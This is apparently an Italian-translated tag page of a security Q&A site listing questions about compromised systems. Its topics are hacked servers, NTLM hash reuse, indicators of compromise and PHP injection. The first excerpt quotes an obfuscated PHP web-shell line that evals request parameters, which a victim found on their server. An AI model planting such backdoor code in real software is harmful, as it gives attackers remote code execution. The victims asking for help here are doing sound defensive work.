Domande con tag 'system-compromise'

3
risposte

Come posso determinare da dove proviene lo script iniettato?

Ho un server che al momento è stato violato. I file vengono creati sul mio server con contenuti di questo tipo: if(isset($_REQUEST['oUS'])){/*PJEG*/eval($_REQUEST['oUS']);/*z*/exit;/*Lv*/} O come questo: <?php /*auV*/if/*fpFF*/(i...
posta 20.07.2017 - 13:25
1
risposta

Se l'hash NTLM dell'account admin del dominio è compromesso, può essere utilizzato per accedere a qualsiasi macchina in rete

Se un hacker è in grado di ottenere i diritti di amministratore locale e quindi l'hash NTLM dell'amministratore del dominio locale. È possibile utilizzare questo hash senza crack, per accedere alle cartelle condivise in rete e alla condivisio...
posta 04.06.2016 - 09:18
2
risposte

Sito web compromesso, come salvaguardare in futuro?

Ho un server linode con cPanel installato su di esso. Uno dei siti Web su quel server è stato violato e ricevo email da cPanel con le seguenti informazioni Top Processes PID Owner CPU % Memory % Command 30005 princecy 38.32...
posta 26.08.2016 - 20:18
1
risposta

Metriche agnostiche del sistema operativo (o della piattaforma) per capire se un sistema è compromesso?

Per i sistemi basati su Windows, ho visto che le modifiche apportate al Registro di sistema o alle Directory di sistema sono alcune delle cose che vengono utilizzate per tracciare se una macchina è stata compromessa. Cose simili devono esister...
posta 14.06.2014 - 17:09
2
risposte

È possibile essere hackerato da remoto? [chiuso]

Ho un po 'paura dell'hacking remoto, dal momento che sto usando un Windows 7. Vedo cosa può fare un hacker se sfrutta la vulnerabilità DCOM in Windows XP, ma questo tipo di exploit esiste su Windows 7 o Windows 8? In altre parole, gli hacker pos...
posta 17.08.2014 - 12:47
1
risposta

Quanto compromesso dovrei presumere che il mio computer sia?

Avevo girato ssh un po 'di tempo fa per fare un po' di lavoro remoto. Stavo solo guardando alcune informazioni di netstat quando ho notato che qualcuno aveva stabilito una sessione ssh con me D: ho disattivato immediatamente ssh e ho cercato in...
posta 23.05.2014 - 03:31
2
risposte

Guida alla configurazione della migliore fonte di sicurezza

Nel corso degli anni ho utilizzato una serie di diverse fonti di guida alla configurazione della sicurezza per uno spettro di sistemi, tra cui ad esempio: link link link link link link etc Dato che ci sono così tante...
posta 05.10.2018 - 02:26
0
risposte

I sistemi in esecuzione sono più sensibili dei sistemi di spegnimento?

Supponiamo che un utente malintenzionato abbia ottenuto l'accesso fisico a un dispositivo (uno smartphone, per esempio). Sarebbe più difficile per l'autore dell'attacco compiere azioni dannose sul telefono quando il telefono è spento? Sto f...
posta 27.08.2018 - 13:17
1
risposta

CentOS 6.8 strumenti di rete - Uno di questi è compromesso?

Ho un sistema CentOS 6.8 che sembra funzionare con Tripwire (la versione Open Source). Il sistema si trova su una rete interna dietro un firewall che non sta inoltrando alcuna connessione in entrata. Cioè il sistema Centos può accedere a Interne...
posta 16.01.2017 - 19:07
1
risposta

PHP Hack Injection - Aiuto per risolvere e capire [duplicare]

Recentemente siamo stati infettati da un hack PHP e speravo che voi poteste gettare qualche altra luce sull'argomento. Principalmente come funziona questo hack e come risolverlo? Ci stiamo muovendo verso una nuova configurazione, che second...
posta 14.12.2016 - 23:33